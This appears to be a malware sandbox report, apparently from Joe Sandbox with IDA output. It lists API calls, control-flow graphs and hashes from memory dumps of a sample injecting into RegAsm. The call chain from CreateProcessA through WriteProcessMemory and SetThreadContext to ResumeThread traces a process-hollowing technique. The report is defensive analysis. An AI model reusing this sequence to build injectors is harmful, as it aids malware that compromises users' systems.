                  • Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID: |'
                  • API String ID: 963392458-3784055907
                  • Opcode ID: a67b75670c3c72997f611a0b9247058a95f620511d45ec6bb972796345bf3933
                  • Instruction ID: 271f59ab8c9eaef5f999ec030ab55a77cf7b0d1c08273f1c5faa78bfa465169d
                  • Opcode Fuzzy Hash: a67b75670c3c72997f611a0b9247058a95f620511d45ec6bb972796345bf3933
                  • Instruction Fuzzy Hash: 90A17E71D102599FDB10CFA8C881BEDBBF2FF48304F14826AE819A7291D7749995CF92

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 78 2c962c-2ca505 81 2ca559-2ca579 78->81 82 2ca507-2ca52c 78->82 86 2ca5cd-2ca5fe 81->86 87 2ca57b-2ca5a0 81->87 82->81 85 2ca52e-2ca530 82->85 88 2ca532-2ca53c 85->88 89 2ca553-2ca556 85->89 96 2ca655-2ca70c CreateProcessA 86->96 97 2ca600-2ca628 86->97 87->86 94 2ca5a2-2ca5a4 87->94 91 2ca53e 88->91 92 2ca540-2ca54f 88->92 89->81 91->92 92->92 95 2ca551 92->95 98 2ca5a6-2ca5b0 94->98 99 2ca5c7-2ca5ca 94->99 95->89 109 2ca70e-2ca714 96->109 110 2ca715-2ca790 96->110 97->96 105 2ca62a-2ca62c 97->105 100 2ca5b4-2ca5c3 98->100 101 2ca5b2 98->101 99->86 100->100 104 2ca5c5 100->104 101->100 104->99 107 2ca62e-2ca638 105->107 108 2ca64f-2ca652 105->108 111 2ca63c-2ca64b 107->111 112 2ca63a 107->112 108->96 109->110 122 2ca7a0-2ca7a4 110->122 123 2ca792-2ca796 110->123 111->111 113 2ca64d 111->113 112->111 113->108 125 2ca7b4-2ca7b8 122->125 126 2ca7a6-2ca7aa 122->126 123->122 124 2ca798-2ca79b call 2c0fd0 123->124 124->122 127 2ca7c8-2ca7cc 125->127 128 2ca7ba-2ca7be 125->128 126->125 130 2ca7ac-2ca7af call 2c0fd0 126->130 132 2ca7de-2ca7e5 127->132 133 2ca7ce-2ca7d4 127->133 128->127 131 2ca7c0-2ca7c3 call 2c0fd0 128->131 130->125 131->127 136 2ca7fc 132->136 137 2ca7e7-2ca7f6 132->137 133->132 139 2ca7fd 136->139 137->136 139->139
                  APIs
                  • CreateProcessA.KERNEL32(?,?,00000005,?,?,?,?,?,?,?), ref: 002CA6F9
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID: |'
                  • API String ID: 963392458-3784055907
                  • Opcode ID: 07b87071c297ac2803fbd6654dbc159b1dbb494c2cad0ecf28eabe989b3e0e3e
                  • Instruction ID: 24ff2c23f1d0d3e6eb0c5a44ad44b63ef355500107427f2e2758b783b94a4e25
                  • Opcode Fuzzy Hash: 07b87071c297ac2803fbd6654dbc159b1dbb494c2cad0ecf28eabe989b3e0e3e
                  • Instruction Fuzzy Hash: 4FA15B71D102199FDB10CFA8C841BEDBBB2BF48308F14826AE819A7291D7749995CF92

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 283 2c9674-2caf59 286 2caf69-2cafa2 WriteProcessMemory 283->286 287 2caf5b-2caf67 283->287 288 2cafab-2cafd3 286->288 289 2cafa4-2cafaa 286->289 287->286 289->288
                  APIs
                  • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00010002), ref: 002CAF95
                  Memory Dump Source
                  • Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0
                  • Opcode ID: 922c7f4fed9128132e15105c41cb803766660b71985d1ca5026b282a624e467a
                  • Instruction ID: eaf35a2ab38a938789af5c51bea021346f29ebcc8af5fbf906d9e1c40b7f2aa2
                  • Opcode Fuzzy Hash: 922c7f4fed9128132e15105c41cb803766660b71985d1ca5026b282a624e467a
                  • Instruction Fuzzy Hash: 3A2113B19103099FCF10CF9AC885BEEBBF5FB48314F10852EE818A7640D378A954CBA1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 292 2c9650-2caa0c ReadProcessMemory 295 2caa0e-2caa14 292->295 296 2caa15-2caa3d 292->296 295->296
                  APIs
                  • ReadProcessMemory.KERNEL32(?,?,?,?,00010002), ref: 002CA9FF
                  Memory Dump Source
                  • Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd
                  Similarity
                  • API ID: MemoryProcessRead
                  • String ID:
                  • API String ID: 1726664587-0
                  • Opcode ID: 222bb02d61604917d45e106b4406c41086463303562ecea6ac8add129471dfcc
                  • Instruction ID: d8b73126be8fdf7dcfa077c236e9c93d7d36b832c7621789ab51be8b56aeb9eb
                  • Opcode Fuzzy Hash: 222bb02d61604917d45e106b4406c41086463303562ecea6ac8add129471dfcc
                  • Instruction Fuzzy Hash: 1E2103B59103099FCB10CF9AC884BDEBBF5FB48310F108529E918A7240D374A954CBA5

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 299 2c9638-2ca904 302 2ca906-2ca90e 299->302 303 2ca910-2ca93c Wow64SetThreadContext 299->303 302->303 304 2ca93e-2ca944 303->304 305 2ca945-2ca96d 303->305 304->305
                  APIs
                  • Wow64SetThreadContext.KERNEL32(02779214,00000000), ref: 002CA92F
                  Memory Dump Source
                  • Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: 8c15e2083daa2374bf176b1a6b4168539b69228616109d6542cbc00513a96885
                  • Instruction ID: 49efd7a405fcdda03cf4952a692f45a6a214d56106679cd11e15f70ae339bda2
                  • Opcode Fuzzy Hash: 8c15e2083daa2374bf176b1a6b4168539b69228616109d6542cbc00513a96885
                  • Instruction Fuzzy Hash: C92147B1D102199FCB10CF9AC845BEEFBF4EB08324F51822AD818B7340D378A954CBA1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 308 2c9680-2ca904 311 2ca906-2ca90e 308->311 312 2ca910-2ca93c Wow64SetThreadContext 308->312 311->312 313 2ca93e-2ca944 312->313 314 2ca945-2ca96d 312->314 313->314
                  APIs
                  • Wow64SetThreadContext.KERNEL32(02779214,00000000), ref: 002CA92F
                  Memory Dump Source
                  • Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: c69cce41f048f1c4d71e98a3462ac056ed092aebf8f22dabdd7aeffed2df65f8
                  • Instruction ID: 49ae41c9f63cdaf2801f5a743c0033bb5651145e71091a1eab3e5ba59e790938
                  • Opcode Fuzzy Hash: c69cce41f048f1c4d71e98a3462ac056ed092aebf8f22dabdd7aeffed2df65f8
                  • Instruction Fuzzy Hash: BC2127B1D106199FCB10CF9AC845BAEFBB4EB48324F55826AD818B7340D378A954CBA1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 317 2ca8b0-2ca904 320 2ca906-2ca90e 317->320 321 2ca910-2ca93c Wow64SetThreadContext 317->321 320->321 322 2ca93e-2ca944 321->322 323 2ca945-2ca96d 321->323 322->323
                  APIs
                  • Wow64SetThreadContext.KERNEL32(02779214,00000000), ref: 002CA92F
                  Memory Dump Source
                  • Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: 85265f476c0aaca72a56fcdd03146f650f6f02f6059113211ec25f98cb9c179f
                  • Instruction ID: 1b25e0e78fbee5837310cda2048cf585200c816e96f2430a4a05d20795fd1bc7
                  • Opcode Fuzzy Hash: 85265f476c0aaca72a56fcdd03146f650f6f02f6059113211ec25f98cb9c179f
                  • Instruction Fuzzy Hash: 1C2165B1D0021A9FCB10CF9AC8857AEFBB0AF09320F15812AD818B7340D338A944CFA1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 326 2c9668-2caac8 VirtualAllocEx 329 2caaca-2caad0 326->329 330 2caad1-2caaee 326->330 329->330
                  APIs
                  • VirtualAllocEx.KERNEL32(?,?,?,?,00010002), ref: 002CAABB
                  Memory Dump Source
                  • Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: a493ffe700ba56ed02dca078272b8b0afab94bab64eea30a5561fbdadfb8be63
                  • Instruction ID: c7c6a5c94fbe42c9124dff6ab011505577e7a92415da11070532321e3a959f1d
                  • Opcode Fuzzy Hash: a493ffe700ba56ed02dca078272b8b0afab94bab64eea30a5561fbdadfb8be63
                  • Instruction Fuzzy Hash: 801123B59103489FCF10CF9AC984BEEFFF4EB88320F208419E919A7210C374A954CBA1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 333 2c9698-2cb054 ResumeThread 336 2cb05d-2cb07a 333->336 337 2cb056-2cb05c 333->337 337->336
                  APIs
                  • ResumeThread.KERNEL32(02779214), ref: 002CB047
                  Memory Dump Source
                  • Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd
                  Similarity
                  • API ID: ResumeThread
                  • String ID:
                  • API String ID: 947044025-0
                  • Opcode ID: 2f8c3c0b8e1770b9e55e3caeecbbb13c8f86e6b91dc09ef9fd335cc5d876bab2
                  • Instruction ID: 15e63503f2998912356f29a4f1402c0d74f9a6ff5a2b544ff4b538f872214928
                  • Opcode Fuzzy Hash: 2f8c3c0b8e1770b9e55e3caeecbbb13c8f86e6b91dc09ef9fd335cc5d876bab2
                  • Instruction Fuzzy Hash: 611125B19103098FCB10DF9AD448BEEFBF4EB49320F20856AD519A7750C374A944CFA5

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 340 2cafe1-2cb054 ResumeThread 342 2cb05d-2cb07a 340->342 343 2cb056-2cb05c 340->343 343->342
                  APIs
                  • ResumeThread.KERNEL32(02779214), ref: 002CB047
                  Memory Dump Source
                  • Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd
                  Similarity
                  • API ID: ResumeThread
                  • String ID:
                  • API String ID: 947044025-0
                  • Opcode ID: 23c4897854f94b110535b3e73e9dc8fa4336193604729dd8f653a2f9d835651f
                  • Instruction ID: 9f97914e4d8ffdd03f034e85e737107a9f8f1d669091da15d651a4aee29ef544
                  • Opcode Fuzzy Hash: 23c4897854f94b110535b3e73e9dc8fa4336193604729dd8f653a2f9d835651f
                  • Instruction Fuzzy Hash: FE1113B19002498FCB10CF9AD488BEEFBF5AB89324F24846AD459A3250C374A944CFA5
                  Memory Dump Source
                  • Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a5c0b3870745cfc4cdb331cde7d8d92e17319ab56002bc0618bf5c7bbeb116a5
                  • Instruction ID: fd5d06a05e50b9e119c82450a44a4ab14d3a085167cc1cf1446e6a1f61b30724
                  • Opcode Fuzzy Hash: a5c0b3870745cfc4cdb331cde7d8d92e17319ab56002bc0618bf5c7bbeb116a5
                  • Instruction Fuzzy Hash: FB516D71A102498FDB05EFB9E85579EBFF2BF88300F44C529D0089B269EB349949CF90
                  Memory Dump Source
                  • Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 52648c20d5c31b285c472fb586ad934616eb243982c88f485e2bc91a16bfad52
                  • Instruction ID: 788fdec9bee84b2847c7a9cf80d996231a81b5c8dcd18006a937aa8feb308482
                  • Opcode Fuzzy Hash: 52648c20d5c31b285c472fb586ad934616eb243982c88f485e2bc91a16bfad52
                  • Instruction Fuzzy Hash: 784143B1E116588BEB1CCF6B8D4478EFAF7AFC8304F14C1BA950DA6255EB7009558F14

                  Execution Graph

                  Execution Coverage:1.2%
                  Dynamic/Decrypted Code Coverage:4.2%
                  Signature Coverage:7.4%
                  Total number of Nodes:95
                  Total number of Limit Nodes:7
                  execution_graph 59108 42f843 59111 42e623 59108->59111 59114 42c8d3 59111->59114 59113 42e63c 59115 42c8ed 59114->59115 59116 42c8fe RtlFreeHeap 59115->59116 59116->59113 59117 42f7e3 59118 42f7f3 59117->59118 59119 42f7f9 59117->59119 59122 42e703 59119->59122 59121 42f81f 59125 42c883 59122->59125 59124 42e71e 59124->59121 59126 42c8a0 59125->59126 59127 42c8b1 RtlAllocateHeap 59126->59127 59127->59124 59128 424903 59129 42491f 59128->59129 59130 424947 59129->59130 59131 42495b 59129->59131 59132 42c563 NtClose 59130->59132 59138 42c563 59131->59138 59134 424950 59132->59134 59135 424964 59141 42e743 RtlAllocateHeap 59135->59141 59137 42496f 59139 42c57d 59138->59139 59140 42c58e NtClose 59139->59140 59140->59135 59141->59137 59214 424c93 59219 424cac 59214->59219 59215 424d3c 59216 424cf7 59217 42e623 RtlFreeHeap 59216->59217 59218 424d07 59217->59218 59219->59215 59219->59216 59220 424d37 59219->59220 59221 42e623 RtlFreeHeap 59220->59221 59221->59215 59222 42f913 59223 42f883 59222->59223 59224 42e703 RtlAllocateHeap 59223->59224 59225 42f8e0 59223->59225 59226 42f8bd 59224->59226 59227 42e623 RtlFreeHeap 59226->59227 59227->59225 59228 42bb33 59229 42bb4d 59228->59229 59232 22efdc0 LdrInitializeThunk 59229->59232 59230 42bb75 59232->59230 59142 413b03 59146 413b23 59142->59146 59144 413b8c 59145 413b82 59146->59144 59147 41b2c3 RtlFreeHeap LdrInitializeThunk 59146->59147 59147->59145 59148 4019e6 59149 401a06 59148->59149 59152 42fcb3 59149->59152 59155 42e1e3 59152->59155 59156 42e1ff 59155->59156 59165 407203 59156->59165 59158 42e215 59164 401a7a 59158->59164 59168 41afb3 59158->59168 59160 42e234 59161 42c923 ExitProcess 59160->59161 59162 42e249 59160->59162 59161->59162 59179 42c923 59162->59179 59182 416323 59165->59182 59167 407210 59167->59158 59169 41afdf 59168->59169 59198 41aea3 59169->59198 59172 41b00c 59173 41b017 59172->59173 59176 42c563 NtClose 59172->59176 59173->59160 59174 41b024 59175 41b040 59174->59175 59177 42c563 NtClose 59174->59177 59175->59160 59176->59173 59178 41b036 59177->59178 59178->59160 59180 42c93d 59179->59180 59181 42c94e ExitProcess 59180->59181 59181->59164 59183 416340 59182->59183 59185 416359 59183->59185 59186 42cfa3 59183->59186 59185->59167 59188 42cfbd 59186->59188 59187 42cfec 59187->59185 59188->59187 59193 42bb83 59188->59193 59191 42e623 RtlFreeHeap 59192 42d065 59191->59192 59192->59185 59194 42bba0 59193->59194 59197 22efae8 LdrInitializeThunk 59194->59197 59195 42bbcc 59195->59191 59197->59195 59199 41af99 59198->59199 59200 41aebd 59198->59200 59199->59172 59199->59174 59204 42bc23 59200->59204 59203 42c563 NtClose 59203->59199 59205 42bc3d 59204->59205 59208 22f07ac LdrInitializeThunk 59205->59208 59206 41af8d 59206->59203 59208->59206 59233 22ef9f0 LdrInitializeThunk

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 31 42c563-42c59c call 404583 call 42d7a3 NtClose
                  APIs
                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C597
                  Memory Dump Source
                  • Source File: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close
                  • String ID:
                  • API String ID: 3535843008-0
                  • Opcode ID: 96f056240fafe685daf6fa55bc1be0920503d8e12ced685b7f3f31ef0593642a
                  • Instruction ID: 1d949b529eabaabdef27e6558712febaa9fe5fb270f3c28a710670586d94b21d
                  • Opcode Fuzzy Hash: 96f056240fafe685daf6fa55bc1be0920503d8e12ced685b7f3f31ef0593642a
                  • Instruction Fuzzy Hash: 6AE04F766042147BD610FA5ADC01F9B77ACDFC5714F40441AFE0867141C675791186A4

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 45 22f07ac-22f07c1 LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                  • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                  • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                  • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 42 22efae8-22efafd LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                  • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                  • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                  • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 43 22efb68-22efb7d LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                  • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                  • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                  • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 41 22ef9f0-22efa05 LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                  • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                  • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                  • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 44 22efdc0-22efdd5 LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                  • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                  • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                  • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 26 42c8d3-42c914 call 404583 call 42d7a3 RtlFreeHeap
                  APIs
                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,33F133F3,00000007,00000000,00000004,00000000,00416EEC,000000F4), ref: 0042C90F
                  Memory Dump Source
                  • Source File: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: ceab812759e8158de5a5ac84d472db0a12d41cfdbf74905a48891567a58fb3ad
                  • Instruction ID: a1d5e44e419c5f43a953c6024c3edd79cc08c06400655d89eb787496dd1df9ae
                  • Opcode Fuzzy Hash: ceab812759e8158de5a5ac84d472db0a12d41cfdbf74905a48891567a58fb3ad
                  • Instruction Fuzzy Hash: 70E06DB56042047BD610EE59DC41E9B77ACDFC9714F004419FA08A7241CA74B9108BB4

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 21 42c883-42c8c7 call 404583 call 42d7a3 RtlAllocateHeap
                  APIs
                  • RtlAllocateHeap.NTDLL(?,0041E484,?,?,00000000,?,0041E484,?,?,?), ref: 0042C8C2
                  Memory Dump Source
                  • Source File: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: fcfa1a01d57513169263ffc7a4ff84fc11524f1f96e112cbaab84027832a42ee
                  • Instruction ID: b590f83acaf36a29023c807d359efb1fd208aa40abbca26474ac6304e8d45e96
                  • Opcode Fuzzy Hash: fcfa1a01d57513169263ffc7a4ff84fc11524f1f96e112cbaab84027832a42ee
                  • Instruction Fuzzy Hash: 5FE06DB56042047BCA10EE99EC41E9B73ACDFC4714F00441AFA08B7241D674B9108AB4

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 36 42c923-42c95c call 404583 call 42d7a3 ExitProcess
                  APIs
                  • ExitProcess.KERNELBASE(?), ref: 0042C957
                  Memory Dump Source
                  • Source File: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: 3dd16e71390a05461ac9c330b6713ed5c034b65982e4cb0efbd5251f43070572
                  • Instruction ID: 974abf2e9af91e9e83b3f33a5918f389266a5b4bdd13027a746a45c35a0aad57
                  • Opcode Fuzzy Hash: 3dd16e71390a05461ac9c330b6713ed5c034b65982e4cb0efbd5251f43070572
